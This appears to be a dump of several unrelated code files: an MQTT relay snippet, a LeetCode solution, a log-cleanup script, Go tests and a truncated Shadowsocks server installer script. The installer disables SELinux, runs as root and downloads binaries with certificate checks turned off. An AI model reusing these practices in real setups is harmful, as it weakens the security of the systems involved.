client.on('message',function (topic,payload) {
console.log(String(topic)+': '+String(payload));
io.sockets.emit('mqtt',{
'topic' : String(topic),
'payload' : String(payload)
});
}); |
<reponame>huangbin082/Bin<filename>Algorithm/src/main/java/com/leetcode/Solution_862.java
package com.leetcode;
import java.util.LinkedList;
public class Solution_862 {
public int shortestSubarray(int[] nums, int k) {
int[] preSum = new int[nums.length + 1];
int sum = 0;
for (int i = 0; i < nums.length; i++) {
sum += nums[i];
preSum[i + 1] = sum;
}
int ans = Integer.MAX_VALUE;
LinkedList<Integer> list = new LinkedList<>();
for (int i = 0; i < preSum.length; i++) {
while (!list.isEmpty() && preSum[list.peekLast()] > preSum[i]) {
list.pollLast();
}
while (!list.isEmpty() && preSum[i] - preSum[list.peekFirst()] >= k) {
ans = Math.min(ans, i - list.peekFirst());
list.pollFirst();
}
list.offerLast(i);
}
return ans == Integer.MAX_VALUE ? -1 : ans;
}
}
|
#!/bin/bash
# Remove the log files that are older than 30 days
find /var/log/* -type f -mtime +30 -delete
|
package zio
import (
"fmt"
"io"
"net/http"
"strings"
"testing"
)
func TestDumpReader(t *testing.T) {
cases := []struct {
in io.ReadCloser
want string
}{
{
io.NopCloser(strings.NewReader("Hello")),
"Hello",
},
{
io.NopCloser(strings.NewReader("لوحة المفاتيح العربية")),
"لوحة المفاتيح العربية",
},
{
http.NoBody,
"",
},
}
for i, tc := range cases {
t.Run(fmt.Sprintf("%v", i), func(t *testing.T) {
outR1, outR2, err := DumpReader(tc.in)
if err != nil {
t.Fatal(err)
}
out1 := mustRead(t, outR1)
out2 := mustRead(t, outR2)
if out1 != tc.want {
t.Errorf("out1 wrong\nout: %#v\nwant: %#v\n", out1, tc.want)
}
if out2 != tc.want {
t.Errorf("out2 wrong\nout: %#v\nwant: %#v\n", out2, tc.want)
}
})
}
}
func mustRead(t *testing.T, r io.Reader) string {
out, err := io.ReadAll(r)
if err != nil {
t.Fatal(err)
}
return string(out)
}
func TestExists(t *testing.T) {
tests := []struct {
in string
want bool
}{
{".", true}, // Dir
{"zio.go", true}, // File
{"/dev/null", true}, // Device
{"/proc/1/environ", true}, // Not readable
{"/etc/localtime", true}, // Symlink
{"/nonexistent-path", false},
{"/nonexistent/path", false},
}
for i, tt := range tests {
t.Run(fmt.Sprintf("%v", i), func(t *testing.T) {
out := Exists(tt.in)
if out != tt.want {
t.Errorf("\nout: %#v\nwant: %#v\n", out, tt.want)
}
})
}
}
|
#!/usr/bin/env bash
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH
#
# Auto install Shadowsocks Server (all version)
#
# Copyright (C) 2016-2019 Teddysun <i@teddysun.com>
#
# System Required: CentOS 6+, Debian7+, Ubuntu12+
#
# Reference URL:
# https://github.com/shadowsocks/shadowsocks
# https://github.com/shadowsocks/shadowsocks-go
# https://github.com/shadowsocks/shadowsocks-libev
# https://github.com/shadowsocks/shadowsocks-windows
# https://github.com/shadowsocksr-rm/shadowsocksr
# https://github.com/shadowsocksrr/shadowsocksr
# https://github.com/shadowsocksrr/shadowsocksr-csharp
#
# Thanks:
# @clowwindy <https://twitter.com/clowwindy>
# @breakwa11 <https://twitter.com/breakwa11>
# @cyfdecyf <https://twitter.com/cyfdecyf>
# @madeye <https://github.com/madeye>
# @linusyang <https://github.com/linusyang>
# @Akkariiin <https://github.com/Akkariiin>
#
# Intro: https://teddysun.com/486.html
red='\033[0;31m'
green='\033[0;32m'
yellow='\033[0;33m'
plain='\033[0m'
[[ $EUID -ne 0 ]] && echo -e "[${red}Error${plain}] This script must be run as root!" && exit 1
cur_dir=$( pwd )
software=(Shadowsocks-Python ShadowsocksR Shadowsocks-Go Shadowsocks-libev)
libsodium_file='libsodium-1.0.18'
libsodium_url='https://github.com/jedisct1/libsodium/releases/download/1.0.18-RELEASE/libsodium-1.0.18.tar.gz'
mbedtls_file='mbedtls-2.16.6'
mbedtls_url='https://tls.mbed.org/download/'"$mbedtls_file"'-apache.tgz'
shadowsocks_python_file='shadowsocks-master'
shadowsocks_python_url='https://github.com/shadowsocks/shadowsocks/archive/master.zip'
shadowsocks_python_init='/etc/init.d/shadowsocks-python'
shadowsocks_python_config='/etc/shadowsocks-python/config.json'
shadowsocks_python_centos='https://raw.githubusercontent.com/teddysun/shadowsocks_install/master/shadowsocks'
shadowsocks_python_debian='https://raw.githubusercontent.com/teddysun/shadowsocks_install/master/shadowsocks-debian'
shadowsocks_r_file='shadowsocksr-3.2.2'
shadowsocks_r_url='https://github.com/shadowsocksrr/shadowsocksr/archive/3.2.2.tar.gz'
shadowsocks_r_init='/etc/init.d/shadowsocks-r'
shadowsocks_r_config='/etc/shadowsocks-r/config.json'
shadowsocks_r_centos='https://raw.githubusercontent.com/teddysun/shadowsocks_install/master/shadowsocksR'
shadowsocks_r_debian='https://raw.githubusercontent.com/teddysun/shadowsocks_install/master/shadowsocksR-debian'
shadowsocks_go_file_64='shadowsocks-server-linux64-1.2.2'
shadowsocks_go_url_64='https://dl.lamp.sh/shadowsocks/shadowsocks-server-linux64-1.2.2.gz'
shadowsocks_go_file_32='shadowsocks-server-linux32-1.2.2'
shadowsocks_go_url_32='https://dl.lamp.sh/shadowsocks/shadowsocks-server-linux32-1.2.2.gz'
shadowsocks_go_init='/etc/init.d/shadowsocks-go'
shadowsocks_go_config='/etc/shadowsocks-go/config.json'
shadowsocks_go_centos='https://raw.githubusercontent.com/teddysun/shadowsocks_install/master/shadowsocks-go'
shadowsocks_go_debian='https://raw.githubusercontent.com/teddysun/shadowsocks_install/master/shadowsocks-go-debian'
shadowsocks_libev_init='/etc/init.d/shadowsocks-libev'
shadowsocks_libev_config='/etc/shadowsocks-libev/config.json'
shadowsocks_libev_centos='https://raw.githubusercontent.com/teddysun/shadowsocks_install/master/shadowsocks-libev'
shadowsocks_libev_debian='https://raw.githubusercontent.com/teddysun/shadowsocks_install/master/shadowsocks-libev-debian'
# Stream Ciphers
common_ciphers=(
aes-256-gcm
aes-192-gcm
aes-128-gcm
aes-256-ctr
aes-192-ctr
aes-128-ctr
aes-256-cfb
aes-192-cfb
aes-128-cfb
camellia-128-cfb
camellia-192-cfb
camellia-256-cfb
xchacha20-ietf-poly1305
chacha20-ietf-poly1305
chacha20-ietf
chacha20
salsa20
rc4-md5
)
go_ciphers=(
aes-256-cfb
aes-192-cfb
aes-128-cfb
aes-256-ctr
aes-192-ctr
aes-128-ctr
chacha20-ietf
chacha20
salsa20
rc4-md5
)
r_ciphers=(
none
aes-256-cfb
aes-192-cfb
aes-128-cfb
aes-256-cfb8
aes-192-cfb8
aes-128-cfb8
aes-256-ctr
aes-192-ctr
aes-128-ctr
chacha20-ietf
chacha20
salsa20
xchacha20
xsalsa20
rc4-md5
)
# Reference URL:
# https://github.com/shadowsocksr-rm/shadowsocks-rss/blob/master/ssr.md
# https://github.com/shadowsocksrr/shadowsocksr/commit/a3cf0254508992b7126ab1151df0c2f10bf82680
# Protocol
protocols=(
origin
verify_deflate
auth_sha1_v4
auth_sha1_v4_compatible
auth_aes128_md5
auth_aes128_sha1
auth_chain_a
auth_chain_b
auth_chain_c
auth_chain_d
auth_chain_e
auth_chain_f
)
# obfs
obfs=(
plain
http_simple
http_simple_compatible
http_post
http_post_compatible
tls1.2_ticket_auth
tls1.2_ticket_auth_compatible
tls1.2_ticket_fastauth
tls1.2_ticket_fastauth_compatible
)
# libev obfuscating
obfs_libev=(http tls)
# initialization parameter
libev_obfs=''
disable_selinux(){
if [ -s /etc/selinux/config ] && grep 'SELINUX=enforcing' /etc/selinux/config; then
sed -i 's/SELINUX=enforcing/SELINUX=disabled/g' /etc/selinux/config
setenforce 0
fi
}
check_sys(){
local checkType=$1
local value=$2
local release=''
local systemPackage=''
if [[ -f /etc/redhat-release ]]; then
release='centos'
systemPackage='yum'
elif grep -Eqi 'debian|raspbian' /etc/issue; then
release='debian'
systemPackage='apt'
elif grep -Eqi 'ubuntu' /etc/issue; then
release='ubuntu'
systemPackage='apt'
elif grep -Eqi 'centos|red hat|redhat' /etc/issue; then
release='centos'
systemPackage='yum'
elif grep -Eqi 'debian|raspbian' /proc/version; then
release='debian'
systemPackage='apt'
elif grep -Eqi 'ubuntu' /proc/version; then
release='ubuntu'
systemPackage='apt'
elif grep -Eqi 'centos|red hat|redhat' /proc/version; then
release='centos'
systemPackage='yum'
fi
if [[ "${checkType}" == 'sysRelease' ]]; then
if [ "${value}" == "${release}" ]; then
return 0
else
return 1
fi
elif [[ "${checkType}" == 'packageManager' ]]; then
if [ "${value}" == "${systemPackage}" ]; then
return 0
else
return 1
fi
fi
}
version_ge(){
test "$(echo "$@" | tr ' ' '\n' | sort -rV | head -n 1)" == "$1"
}
version_gt(){
test "$(echo "$@" | tr ' ' '\n' | sort -V | head -n 1)" != "$1"
}
check_kernel_version(){
local kernel_version
kernel_version=$(uname -r | cut -d- -f1)
if version_gt "${kernel_version}" 3.7.0; then
return 0
else
return 1
fi
}
check_kernel_headers(){
if check_sys packageManager yum; then
if rpm -qa | grep -q headers-"$(uname -r)"; then
return 0
else
return 1
fi
elif check_sys packageManager apt; then
if dpkg -s linux-headers-"$(uname -r)" > /dev/null 2>&1; then
return 0
else
return 1
fi
fi
return 1
}
getversion(){
if [[ -s /etc/redhat-release ]]; then
grep -oE '[0-9.]+' /etc/redhat-release
else
grep -oE '[0-9.]+' /etc/issue
fi
}
centosversion(){
if check_sys sysRelease centos; then
local code=$1
local version
version="$(getversion)"
local main_ver=${version%%.*}
if [ "$main_ver" == "$code" ]; then
return 0
else
return 1
fi
else
return 1
fi
}
autoconf_version(){
if [ ! "$(command -v autoconf)" ]; then
echo -e "[${green}Info${plain}] Starting install package autoconf"
if check_sys packageManager yum; then
yum install -y autoconf > /dev/null 2>&1 || echo -e "[${red}Error:${plain}] Failed to install autoconf"
elif check_sys packageManager apt; then
apt-get -y update > /dev/null 2>&1
apt-get -y install autoconf > /dev/null 2>&1 || echo -e "[${red}Error:${plain}] Failed to install autoconf"
fi
fi
local autoconf_ver
autoconf_ver=$(autoconf --version | grep autoconf | grep -oE '[0-9.]+')
if version_ge "${autoconf_ver}" 2.67; then
return 0
else
return 1
fi
}
get_ip(){
local IP
IP=$( ip addr | egrep -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | egrep -v '^192\.168|^172\.1[6-9]\.|^172\.2[0-9]\.|^172\.3[0-2]\.|^10\.|^127\.|^255\.|^0\.' | head -n 1 )
[ -z "${IP}" ] && IP=$( wget -qO- -t1 -T2 ipv4.icanhazip.com )
[ -z "${IP}" ] && IP=$( wget -qO- -t1 -T2 ipinfo.io/ip )
echo "${IP}"
}
get_ipv6(){
local ipv6
ipv6=$(wget -qO- -t1 -T2 ipv6.icanhazip.com)
[ -z "${ipv6}" ] && return 1 || return 0
}
get_libev_ver(){
libev_ver=$(wget --no-check-certificate -qO- https://api.github.com/repos/shadowsocks/shadowsocks-libev/releases/latest | grep 'tag_name' | cut -d\" -f4)
[ -z "${libev_ver}" ] && echo -e "[${red}Error${plain}] Get shadowsocks-libev latest version failed" && exit 1
}
get_opsy(){
[ -f /etc/redhat-release ] && awk '{print ($1,$3~/^[0-9]/?$3:$4)}' /etc/redhat-release && return
[ -f /etc/os-release ] && awk -F'[= "]' '/PRETTY_NAME/{print $3,$4,$5}' /etc/os-release && return
[ -f /etc/lsb-release ] && awk -F'[="]+' '/DESCRIPTION/{print $2}' /etc/lsb-release && return
}
is_64bit(){
if [ $(getconf WORD_BIT) = '32' ] && [ $(getconf LONG_BIT) = '64' ] ; then
return 0
else
return 1
fi
}
debianversion(){
if check_sys sysRelease debian;then
local version
version=$( get_opsy )
local code
code=${1}
local main_ver
main_ver=$( echo "${version}" | sed 's/[^0-9]//g')
if [ "${main_ver}" == "${code}" ];then
return 0
else
return 1
fi
else
return 1
fi
}
download(){
local filename
filename=$(basename "$1")
if [ -f "${1}" ]; then
echo "${filename} [found]"
else
echo "${filename} not found, download now..."
wget --no-check-certificate -c -t3 -T60 -O "${1}" "${2}"
if [ $? -ne 0 ]; then
echo -e "[${red}Error${plain}] Download ${filename} failed."
exit 1
fi
fi
}
download_files(){
cd "${cur_dir}" || exit
if [ "${selected}" == '1' ]; then
download "${shadowsocks_python_file}.zip" "${shadowsocks_python_url}"
if check_sys packageManager yum; then
download "${shadowsocks_python_init}" "${shadowsocks_python_centos}"
elif check_sys packageManager apt; then
download "${shadowsocks_python_init}" "${shadowsocks_python_debian}"
fi
elif [ "${selected}" == '2' ]; then
download "${shadowsocks_r_file}.tar.gz" "${shadowsocks_r_url}"
if check_sys packageManager yum; then
download "${shadowsocks_r_init}" "${shadowsocks_r_centos}"
elif check_sys packageManager apt; then
download "${shadowsocks_r_init}" "${shadowsocks_r_debian}"
fi
elif [ "${selected}" == '3' ]; then
if is_64bit; then
download "${shadowsocks_go_file_64}.gz" "${shadowsocks_go_url_64}"
else
download "${shadowsocks_go_file_32}.gz" "${shadowsocks_go_url_32}"
fi
if check_sys packageManager yum; then
download "${shadowsocks_go_init}" "${shadowsocks_go_centos}"
elif check_sys packageManager apt; then
download "${shadowsocks_go_init}" "${shadowsocks_go_debian}"
fi
elif [ "${selected}" == '4' ]; then
get_libev_ver
shadowsocks_libev_file="shadowsocks-libev-$(echo "${libev_ver}" | sed -e 's/^[a-zA-Z]//g')"
shadowsocks_libev_url="https://github.com/shadowsocks/shadowsocks-libev/releases/download/${libev_ver}/${shadowsocks_libev_file}.tar.gz"
download "${shadowsocks_libev_file}.tar.gz" "${shadowsocks_libev_url}"
if check_sys packageManager yum; then
download "${shadowsocks_libev_init}" "${shadowsocks_libev_centos}"
elif check_sys packageManager apt; then
download "${shadowsocks_libev_init}" "${shadowsocks_libev_debian}"
fi
fi
}
get_char(){
SAVEDSTTY=$(stty -g)
stty -echo
stty cbreak
dd if=/dev/tty bs=1 count=1 2> /dev/null
stty -raw
stty echo
stty "$SAVEDSTTY"
}
error_detect_depends(){
local command=$1
local depend
depend=$(echo "${command}" | awk '{print $4}')
echo -e "[${green}Info${plain}] Starting to install package ${depend}"
${command} > /dev/null 2>&1
if [ $? -ne 0 ]; then
echo -e "[${red}Error${plain}] Failed to install ${red}${depend}${plain}"
echo 'Please visit: https://teddysun.com/486.html and contact.'
exit 1
fi
}
config_firewall(){
if centosversion 6; then
/etc/init.d/iptables status > /dev/null 2>&1
if [ $? -eq 0 ]; then
iptables -L -n | grep -i "${shadowsocksport}" > /dev/null 2>&1
if [ $? -ne 0 ]; then
iptables -I INPUT -m state --state NEW -m tcp -p tcp --dport "${shadowsocksport}" -j ACCEPT
iptables -I INPUT -m state --state NEW -m udp -p udp --dport "${shadowsocksport}" -j ACCEPT
/etc/init.d/iptables save
/etc/init.d/iptables restart
else
echo -e "[${green}Info${plain}] port ${green}${shadowsocksport}${plain} already be enabled."
fi
else
echo -e "[${yellow}Warning${plain}] iptables looks like not running or not installed, please enable port ${shadowsocksport} manually if necessary."
fi
elif centosversion 7; then
systemctl status firewalld > /dev/null 2>&1
if [ $? -eq 0 ]; then
default_zone=$(firewall-cmd --get-default-zone)
firewall-cmd --permanent --zone="${default_zone}" --add-port="${shadowsocksport}"/tcp
firewall-cmd --permanent --zone="${default_zone}" --add-port="${shadowsocksport}"/udp
firewall-cmd --reload
else
echo -e "[${yellow}Warning${plain}] firewalld looks like not running or not installed, please enable port ${shadowsocksport} manually if necessary."
fi
fi
}
config_shadowsocks(){
if [ "${selected}" == '1' ]; then
if [ ! -d "$(dirname ${shadowsocks_python_config})" ]; then
mkdir -p $(dirname ${shadowsocks_python_config})
fi
cat > ${shadowsocks_python_config}<<-EOF
{
"server":"0.0.0.0",
"server_port":${shadowsocksport},
"local_address":"127.0.0.1",
"local_port":1080,
"password":"${shadowsockspwd}",
"timeout":300,
"method":"${shadowsockscipher}",
"fast_open":false
}
EOF
elif [ "${selected}" == '2' ]; then
if [ ! -d "$(dirname ${shadowsocks_r_config})" ]; then
mkdir -p $(dirname ${shadowsocks_r_config})
fi
cat > ${shadowsocks_r_config}<<-EOF
{
"server":"0.0.0.0",
"server_ipv6":"::",
"server_port":${shadowsocksport},
"local_address":"127.0.0.1",
"local_port":1080,
"password":"${shadowsockspwd}",
"timeout":120,
"method":"${shadowsockscipher}",
"protocol":"${shadowsockprotocol}",
"protocol_param":"",
"obfs":"${shadowsockobfs}",
"obfs_param":"",
"redirect":"",
"dns_ipv6":false,
"fast_open":false,
"workers":1
}
EOF
elif [ "${selected}" == '3' ]; then
if [ ! -d "$(dirname ${shadowsocks_go_config})" ]; then
mkdir -p $(dirname ${shadowsocks_go_config})
fi
cat > ${shadowsocks_go_config}<<-EOF
{
"server":"0.0.0.0",
"server_port":${shadowsocksport},
"local_port":1080,
"password":"${shadowsockspwd}",
"method":"${shadowsockscipher}",
"timeout":300
}
EOF
elif [ "${selected}" == '4' ]; then
local server_value="\"0.0.0.0\""
if get_ipv6; then
server_value="[\"[::0]\",\"0.0.0.0\"]"
fi
if [ ! -d "$(dirname ${shadowsocks_libev_config})" ]; then
mkdir -p $(dirname ${shadowsocks_libev_config})
fi
if [ "${libev_obfs}" == 'y' ] || [ "${libev_obfs}" == 'Y' ]; then
cat > ${shadowsocks_libev_config}<<-EOF
{
"server":${server_value},
"server_port":${shadowsocksport},
"password":"${shadowsockspwd}",
"timeout":300,
"user":"nobody",
"method":"${shadowsockscipher}",
"fast_open":false,
"nameserver":"1.0.0.1",
"mode":"tcp_and_udp",
"plugin":"obfs-server",
"plugin_opts":"obfs=${shadowsocklibev_obfs}"
}
EOF
else
cat > ${shadowsocks_libev_config}<<-EOF
{
"server":${server_value},
"server_port":${shadowsocksport},
"password":"${shadowsockspwd}",
"timeout":300,
"user":"nobody",
"method":"${shadowsockscipher}",
"fast_open":false,
"nameserver":"1.0.0.1",
"mode":"tcp_and_udp"
}
EOF
fi
fi
}
install_dependencies(){
if check_sys packageManager yum; then
echo -e "[${green}Info${plain}] Checking the EPEL repository..."
if [ ! -f /etc/yum.repos.d/epel.repo ]; then
yum install -y epel-release > /dev/null 2>&1
fi
[ ! -f /etc/yum.repos.d/epel.repo ] && echo -e "[${red}Error${plain}] Install EPEL repository failed, please check it." && exit 1
[ ! "$(command -v yum-config-manager)" ] && yum install -y yum-utils > /dev/null 2>&1
[ x"$(yum-config-manager epel | grep -w enabled | awk '{print $3}')" != x'True' ] && yum-config-manager --enable epel > /dev/null 2>&1
echo -e "[${green}Info${plain}] Checking the EPEL repository complete..."
yum_depends=(
unzip gzip openssl openssl-devel gcc python python-devel python-setuptools pcre pcre-devel libtool libevent
autoconf automake make curl curl-devel zlib-devel perl perl-devel cpio expat-devel gettext-devel
libev-devel c-ares-devel git qrencode
)
for depend in ${yum_depends[@]}; do
error_detect_depends "yum -y install ${depend}"
done
elif check_sys packageManager apt; then
apt_depends=(
gettext build-essential unzip gzip python python-dev python-setuptools curl openssl libssl-dev
autoconf automake libtool gcc make perl cpio libpcre3 libpcre3-dev zlib1g-dev libev-dev libc-ares-dev git qrencode
)
apt-get -y update
for depend in ${apt_depends[@]}; do
error_detect_depends "apt-get -y install ${depend}"
done
fi
}
install_check(){
if check_sys packageManager yum || check_sys packageManager apt; then
if centosversion 5; then
return 1
fi
return 0
else
return 1
fi
}
install_select(){
if ! install_check; then
echo -e "[${red}Error${plain}] Your OS is not supported to run it!"
echo 'Please change to CentOS 6+/Debian 7+/Ubuntu 12+ and try again.'
exit 1
fi
clear
while true
do
echo "Which Shadowsocks server you'd select:"
for ((i=1;i<=${#software[@]};i++ )); do
hint="${software[$i-1]}"
echo -e "${green}${i}${plain}) ${hint}"
done
read -p "Please enter a number (Default ${software[0]}):" selected
[ -z "${selected}" ] && selected='1'
case "${selected}" in
1|2|3|4)
echo
echo "You choose = ${software[${selected}-1]}"
echo
break
;;
*)
echo -e "[${red}Error${plain}] Please only enter a number [1-4]"
;;
esac
done
}
install_prepare_password(){
echo "Please enter password for ${software[${selected}-1]}"
read -p '(Default password: teddysun.com):' shadowsockspwd
[ -z "${shadowsockspwd}" ] && shadowsockspwd='teddysun.com'
echo
echo "password = ${shadowsockspwd}"
echo
}
install_prepare_port() {
while true
do
dport=$(shuf -i 9000-19999 -n 1)
echo -e "Please enter a port for ${software[${selected}-1]} [1-65535]"
read -p "(Default port: ${dport}):" shadowsocksport
[ -z "${shadowsocksport}" ] && shadowsocksport=${dport}
expr "${shadowsocksport}" + 1 &>/dev/null
if [ $? -eq 0 ]; then
if [ "${shadowsocksport}" -ge 1 ] && [ "${shadowsocksport}" -le 65535 ] && [ "${shadowsocksport:0:1}" != 0 ]; then
echo
echo "port = ${shadowsocksport}"
echo
break
fi
fi
echo -e "[${red}Error${plain}] Please enter a correct number [1-65535]"
done
}
install_prepare_cipher(){
while true
do
echo -e "Please select stream cipher for ${software[${selected}-1]}:"
if [[ "${selected}" == '1' || "${selected}" == '4' ]]; then
for ((i=1;i<=${#common_ciphers[@]};i++ )); do
hint="${common_ciphers[$i-1]}"
echo -e "${green}${i}${plain}) ${hint}"
done
read -p "Which cipher you'd select(Default: ${common_ciphers[0]}):" pick
[ -z "$pick" ] && pick=1
expr ${pick} + 1 &>/dev/null
if [ $? -ne 0 ]; then
echo -e "[${red}Error${plain}] Please enter a number"
continue
fi
if [[ "$pick" -lt 1 || "$pick" -gt ${#common_ciphers[@]} ]]; then
echo -e "[${red}Error${plain}] Please enter a number between 1 and ${#common_ciphers[@]}"
continue
fi
shadowsockscipher=${common_ciphers[$pick-1]}
elif [ "${selected}" == '2' ]; then
for ((i=1;i<=${#r_ciphers[@]};i++ )); do
hint="${r_ciphers[$i-1]}"
echo -e "${green}${i}${plain}) ${hint}"
done
read -p "Which cipher you'd select(Default: ${r_ciphers[1]}):" pick
[ -z "$pick" ] && pick=2
expr ${pick} + 1 &>/dev/null
if [ $? -ne 0 ]; then
echo -e "[${red}Error${plain}] Please enter a number"
continue
fi
if [[ "$pick" -lt 1 || "$pick" -gt ${#r_ciphers[@]} ]]; then
echo -e "[${red}Error${plain}] Please enter a number between 1 and ${#r_ciphers[@]}"
continue
fi
shadowsockscipher=${r_ciphers[$pick-1]}
elif [ "${selected}" == '3' ]; then
for ((i=1;i<=${#go_ciphers[@]};i++ )); do
hint="${go_ciphers[$i-1]}"
echo -e "${green}${i}${plain}) ${hint}"
done
read -p "Which cipher you'd select(Default: ${go_ciphers[0]}):" pick
[ -z "$pick" ] && pick=1
expr ${pick} + 1 &>/dev/null
if [ $? -ne 0 ]; then
echo -e "[${red}Error${plain}] Please enter a number"
continue
fi
if [[ "$pick" -lt 1 || "$pick" -gt ${#go_ciphers[@]} ]]; then
echo -e "[${red}Error${plain}] Please enter a number between 1 and ${#go_ciphers[@]}"
continue
fi
shadowsockscipher=${go_ciphers[$pick-1]}
fi
echo
echo "cipher = ${shadowsockscipher}"
echo
break
done
}
install_prepare_protocol(){
while true
do
echo -e "Please select protocol for ${software[${selected}-1]}:"
for ((i=1;i<=${#protocols[@]};i++ )); do
hint="${protocols[$i-1]}"
echo -e "${green}${i}${plain}) ${hint}"
done
read -p "Which protocol you'd select(Default: ${protocols[0]}):" protocol
[ -z "$protocol" ] && protocol=1
expr ${protocol} + 1 &>/dev/null
if [ $? -ne 0 ]; then
echo -e "[${red}Error${plain}] Please enter a number"
continue
fi
if [[ "$protocol" -lt 1 || "$protocol" -gt ${#protocols[@]} ]]; then
echo -e "[${red}Error${plain}] Please enter a number between 1 and ${#protocols[@]}"
continue
fi
shadowsockprotocol=${protocols[$protocol-1]}
echo
echo "protocol = ${shadowsockprotocol}"
echo
break
done
}
install_prepare_obfs(){
while true
do
echo -e "Please select obfs for ${software[${selected}-1]}:"
for ((i=1;i<=${#obfs[@]};i++ )); do
hint="${obfs[$i-1]}"
echo -e "${green}${i}${plain}) ${hint}"
done
read -p "Which obfs you'd select(Default: ${obfs[0]}):" r_obfs
[ -z "$r_obfs" ] && r_obfs=1
expr ${r_obfs} + 1 &>/dev/null
if [ $? -ne 0 ]; then
echo -e "[${red}Error${plain}] Please enter a number"
continue
fi
if [[ "$r_obfs" -lt 1 || "$r_obfs" -gt ${#obfs[@]} ]]; then
echo -e "[${red}Error${plain}] Please enter a number between 1 and ${#obfs[@]}"
continue
fi
shadowsockobfs=${obfs[$r_obfs-1]}
echo
echo "obfs = ${shadowsockobfs}"
echo
break
done
}
install_prepare_libev_obfs(){
if autoconf_version || centosversion 6; then
while true
do
echo -e "Do you want install simple-obfs for ${software[${selected}-1]}? [y/n]"
read -p '(default: n):' libev_obfs
[ -z "$libev_obfs" ] && libev_obfs=n
case "${libev_obfs}" in
y|Y|n|N)
echo
echo "You choose = ${libev_obfs}"
echo
break
;;
*)
echo -e "[${red}Error${plain}] Please only enter [y/n]"
;;
esac
done
if [ "${libev_obfs}" == 'y' ] || [ "${libev_obfs}" == 'Y' ]; then
while true
do
echo -e 'Please select obfs for simple-obfs:'
for ((i=1;i<=${#obfs_libev[@]};i++ )); do
hint="${obfs_libev[$i-1]}"
echo -e "${green}${i}${plain}) ${hint}"
done
read -p "Which obfs you'd select(Default: ${obfs_libev[0]}):" r_libev_obfs
[ -z "$r_libev_obfs" ] && r_libev_obfs=1
expr ${r_libev_obfs} + 1 &>/dev/null
if [ $? -ne 0 ]; then
echo -e "[${red}Error${plain}] Please enter a number"
continue
fi
if [[ "$r_libev_obfs" -lt 1 || "$r_libev_obfs" -gt ${#obfs_libev[@]} ]]; then
echo -e "[${red}Error${plain}] Please enter a number between 1 and ${#obfs_libev[@]}"
continue
fi
shadowsocklibev_obfs=${obfs_libev[$r_libev_obfs-1]}
echo
echo "obfs = ${shadowsocklibev_obfs}"
echo
break
done
fi
else
echo -e "[${green}Info${plain}] autoconf version is less than 2.67, simple-obfs for ${software[${selected}-1]} installation has been skipped"
fi
}
install_prepare(){
if [[ "${selected}" == '1' || "${selected}" == '3' || "${selected}" == '4' ]]; then
install_prepare_password
install_prepare_port
install_prepare_cipher
if [ "${selected}" == '4' ]; then
install_prepare_libev_obfs
fi
elif [ "${selected}" == '2' ]; then
install_prepare_password
install_prepare_port
install_prepare_cipher
install_prepare_protocol
install_prepare_obfs
fi
echo
echo 'Press any key to start...or Press Ctrl+C to cancel'
char=$(get_char)
}
install_libsodium(){
if [ ! -f /usr/lib/libsodium.a ]; then
cd "${cur_dir}" || exit
download "${libsodium_file}.tar.gz" "${libsodium_url}"
tar zxf ${libsodium_file}.tar.gz
cd ${libsodium_file} || exit
./configure --prefix=/usr && make && make install
if [ $? -ne 0 ]; then
echo -e "[${red}Error${plain}] ${libsodium_file} install failed."
install_cleanup
exit 1
fi
else
echo -e "[${green}Info${plain}] ${libsodium_file} already installed."
fi
}
install_mbedtls(){
if [ ! -f /usr/lib/libmbedtls.a ]; then
cd "${cur_dir}" || exit
download "${mbedtls_file}-apache.tgz" "${mbedtls_url}"
tar xf "${mbedtls_file}"-apache.tgz
cd "${mbedtls_file}" || exit
make SHARED=1 CFLAGS=-fPIC
make DESTDIR=/usr install
if [ $? -ne 0 ]; then
echo -e "[${red}Error${plain}] ${mbedtls_file} install failed."
install_cleanup
exit 1
fi
else
echo -e "[${green}Info${plain}] ${mbedtls_file} already installed."
fi
}
install_shadowsocks_python(){
cd "${cur_dir}" || exit
unzip -q ${shadowsocks_python_file}.zip
if [ $? -ne 0 ];then
echo -e "[${red}Error${plain}] unzip ${shadowsocks_python_file}.zip failed, please check unzip command."
install_cleanup
exit 1
fi
cd ${shadowsocks_python_file} || exit
python setup.py install --record /usr/local/shadowsocks_python.log
if [ -f /usr/bin/ssserver ] || [ -f /usr/local/bin/ssserver ]; then
chmod +x ${shadowsocks_python_init}
local service_name
service_name=$(basename ${shadowsocks_python_init})
if check_sys packageManager yum; then
chkconfig --add "${service_name}"
chkconfig "${service_name}" on
elif check_sys packageManager apt; then
update-rc.d -f "${service_name}" defaults
fi
else
echo
echo -e "[${red}Error${plain}] ${software[0]} install failed."
echo 'Please visit: https://teddysun.com/486.html and contact.'
install_cleanup
exit 1
fi
}
install_shadowsocks_r(){
cd "${cur_dir}" || exit
tar zxf ${shadowsocks_r_file}.tar.gz
mv ${shadowsocks_r_file}/shadowsocks /usr/local/
if [ -f /usr/local/shadowsocks/server.py ]; then
chmod +x ${shadowsocks_r_init}
local service_name
service_name=$(basename ${shadowsocks_r_init})
if check_sys packageManager yum; then
chkconfig --add "${service_name}"
chkconfig "${service_name}" on
elif check_sys packageManager apt; then
update-rc.d -f "${service_name}" defaults
fi
else
echo
echo -e "[${red}Error${plain}] ${software[1]} install failed."
echo 'Please visit; https://teddysun.com/486.html and contact.'
install_cleanup
exit 1
fi
}
install_shadowsocks_go(){
cd "${cur_dir}" || exit
if is_64bit; then
gzip -d ${shadowsocks_go_file_64}.gz
if [ $? -ne 0 ];then
echo -e "[${red}Error${plain}] Decompress ${shadowsocks_go_file_64}.gz failed."
install_cleanup
exit 1
fi
mv -f ${shadowsocks_go_file_64} /usr/bin/shadowsocks-server
else
gzip -d ${shadowsocks_go_file_32}.gz
if [ $? -ne 0 ];then
echo -e "[${red}Error${plain}] Decompress ${shadowsocks_go_file_32}.gz failed."
install_cleanup
exit 1
fi
mv -f ${shadowsocks_go_file_32} /usr/bin/shadowsocks-server
fi
if [ -f /usr/bin/shadowsocks-server ]; then
chmod +x /usr/bin/shadowsocks-server
chmod +x ${shadowsocks_go_init}
local service_name
service_name=$(basename ${shadowsocks_go_init})
if check_sys packageManager yum; then
chkconfig --add "${service_name}"
chkconfig "${service_name}" on
elif check_sys packageManager apt; then
update-rc.d -f "${service_name}" defaults
fi
else
echo
echo -e "[${red}Error${plain}] ${software[2]} install failed."
echo 'Please visit: https://teddysun.com/486.html and contact.'
install_cleanup
